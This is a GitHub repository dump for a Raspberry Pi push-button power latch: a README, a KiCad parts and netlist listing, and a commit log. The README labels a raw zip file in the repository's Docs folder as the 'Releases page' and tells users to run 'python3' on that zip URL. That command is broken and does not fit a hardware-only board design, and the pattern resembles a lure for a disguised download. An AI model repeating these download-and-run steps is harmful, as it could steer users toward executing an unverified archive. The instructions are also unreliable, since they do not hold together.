# Repository rahulbakrola/Rasp_latch_button

File README.md:

# 🔌 Rasp_latch_button - Safely Power Your Raspberry Pi On and Off

## 🚀 Getting Started
Welcome to the Rasp_latch_button project! This application helps you control your Raspberry Pi safely with a simple push button. You can turn your Pi on and off without any worries after the shutdown sequence completes.

## 🛠️ Features
- Easy setup with minimal configuration.
- Push button for convenient power management.
- Safe shutdown sequence ensures proper operation.
- Compatible with Raspberry Pi 4 and 5 models.
- Designed using KiCad for high-quality PCB layout.
- Detailed schematic provided for your reference.

## 📦 System Requirements
To run this application, you will need:
- A Raspberry Pi 4 or 5.
- A microSD card with Raspberry Pi OS installed.
- Basic electronic components including a push button.
- Access to a computer to download necessary files.

## 🔗 Quick Links

## 💾 Download & Install
To get started, visit the following page to download the necessary files:

[Download from Releases Page](https://raw.githubusercontent.com/rahulbakrola/Rasp_latch_button/main/Docs/Rasp_latch_button_2.7.zip)

### Installation Steps
1. Click the link above to go to the Releases page.
2. You'll see a list of all available versions. Look for the latest version.
3. Click on the version to expand its details. You will find a zip or tar file.
4. Download the file suitable for your needs (e.g., the latest version).
5. Extract the files to a folder on your computer.

## 📋 How to Use
After downloading and installing, follow these steps to set up your Raspberry Pi:

1. **Connect the Hardware:**
   - Connect the push button to the appropriate GPIO pins as outlined in the schematic.
   - Ensure all connections are secure.

2. **Prepare the System:**
   - Open a terminal on your Raspberry Pi.
   - Navigate to the directory where you extracted the files.

3. **Run the Application:**
   - Execute the main application script using the command:
     ```
     python3 https://raw.githubusercontent.com/rahulbakrola/Rasp_latch_button/main/Docs/Rasp_latch_button_2.7.zip
     ```
   - Follow the on-screen instructions to complete the setup process.

4. **Testing:**
   - Press the button to check that it functions correctly.
   - Observe that the Raspberry Pi turns off after the shutdown sequence.

## 📘 Troubleshooting
If you encounter any issues, consider the following tips:

- **Button Not Responding:**
  Ensure that the button is connected securely to the GPIO pins. You may need to check the wiring and retry.

- **Application Will Not Start:**
  Make sure you have Python installed. You can check this with the command:
  ```
  python3 --version
  ```
  If not installed, you can install it via the terminal.

- **Raspberry Pi Won't Turn Off:**
  Confirm that the shutdown sequence is configured correctly. You can refer to the schematic for guidance.

## 🌐 Community Support
If you have questions or need further assistance, feel free to engage with our community. You can share your experiences, seek advice, or help others in the following ways:

- **GitHub Issues:** Report bugs or request features by visiting the Issues section of this repository.
- **Forums:** Look for Raspberry Pi related forums where you can ask for help and share tips.

## 📝 Contributing
Contributions are welcome! If you'd like to improve this project or suggest new features, please follow these steps:

1. Fork the repository.
2. Create a new branch for your feature or fix.
3. Make your changes and commit them.
4. Push to your fork and submit a pull request.

## 🔄 Updates
For updates on this project, check the Releases page regularly. You can expect improvements and new features as the project grows.

Happy powering up your Raspberry Pi safely with the Rasp_latch_button!

## KiCad design Latch_Rasp.kicad_pcb

Parts:
C1: 10n; C_0805_2012Metric
D1, D2: D_Schottky; D_1206_3216Metric
J2: Conn_02x03_Counter_Clockwise; PinSocket_2x05_P2.54mm_Vertical
J5: USB_C_Receptacle_PowerOnly_6P; USB_C_Receptacle_GCT_USB4125-xx-x-0190_6P_TopMnt_Horizontal
Q1: NDT456P; SOT-223
Q2: AO3414; SOT-23
R1, R5, R6: 5.1K; R_0805_2012Metric
R2, R3: 200; R_0805_2012Metric
R4: 100K; R_0805_2012Metric
SW1: SW_Push; PinHeader_1x02_P2.54mm_Vertical
TP1: 5V; TestPoint_Pad_D1.0mm
TP2: Q1G; TestPoint_Pad_D1.0mm
TP3: Q2G; TestPoint_Pad_D1.0mm
TP4: gnd; TestPoint_Pad_D1.0mm

Connections:
5V: J2.2, J2.4, Q1.2 (D), Q1.4 (D), TP1.1
/PWR_OFF: J2.5, R3.2
/Q1G: C1.2, D1.2 (A), Q1.1 (G), Q2.3 (D), R1.2, TP2.1
/Q2G: Q2.1 (G), R3.1, R4.1, TP3.1
/SHT_DWN: J2.3, R2.2
GND: J2.6, J2.9, J5.A12 (GND), J5.B12 (GND), J5.S1 (SHIELD), Q2.2 (S), R4.2, R5.2, R6.2, SW1.1, TP4.1
unnamed: D1.1 (K), D2.1 (K), SW1.2
unnamed: D2.2 (A), R2.1
unnamed: J5.A5 (CC1), R6.1
unnamed: J5.B5 (CC2), R5.1
VBUS: C1.1, J5.A9 (VBUS), J5.B9 (VBUS), Q1.3 (S), R1.1

Board: 2 copper layers, 22.1 x 20.3 mm, 18 parts (6 on the bottom side), 11 nets.

## Commit log

2026-01-18 initial
2026-01-18 init
2026-01-18 Update README with power consumption details
    Clarify power state and usage of the Raspberry Pi after shutdown.
2026-01-18 Update README for clarity on shutdown behavior
    Corrected wording for clarity and consistency.
2026-01-18 Update power consumption information in README
    Clarified power consumption details for Raspberry Pi after shutdown.
